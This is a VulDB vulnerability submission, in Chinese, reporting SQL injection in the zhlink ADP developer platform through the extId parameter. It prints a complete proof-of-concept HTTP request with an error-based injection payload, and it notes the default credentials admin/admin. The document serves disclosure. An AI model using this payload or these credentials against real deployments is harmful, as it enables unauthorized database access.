提交 #626189: 智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 SQL Injection信息

标题	智互联(深圳)科技有限公司 ADP应用开发者平台 zhlink V1.0.0 SQL Injection
描述	漏洞地址：x.x.x.x:8083/adpweb/a/login GET /adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1 HTTP/1.1 Host: x.x.x.x:8083 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Cookie: JSESSIONID=5F82478A113439530681B398B1596D9C; zhilink.session.id=2efebc93c5ec4946af83e7d1c81a1bd7; lang=zh_CN; Hm_lvt_82116c626a8d504a5c0675073362ef6f=1705660638; Hm_lpvt_82116c626a8d504a5c0675073362ef6f=1705660673 Referer: http://x.x.x.x:8083/adpweb/a/tag/treeselect?url=%2Fsys%2Foffice%2FtreeData%3Ftype%3D1%26companyid%3D&module=&checked=&extId=&isAll= X-Requested-With: XMLHttpRequest Accept-Encoding: gzip 注入点参数：注入点参数：extId 使用默认口令admin/admin登录后测试注入 payload：/adpweb/a/sys/office/treeData?companyid=&extId=%27and%2F%2A%2A%2Fextractvalue%281%2Cconcat%28char%28126%29%2Cmd5%281009983723%29%29%29and%27&isAll=&keywords=111&module=&t=1705660829107&type=1
来源	⚠️ http://x.x.x.x:8083/adpweb/a/login
用户	Id3al (UID 85503)
提交	2025-07-31 11時03分 (9 月前)
管理	2025-08-09 09時46分 (9 days later)
状态	已接受
VulDB条目	319335 [zhilink 智互联(深圳)科技有限公司 ADP Application Developer Platform 应用开发者平台 treeData SQL注入]
积分	20

◂ 上一步一览下一步 ▸

Interested in the pricing of exploits?

See the underground prices here!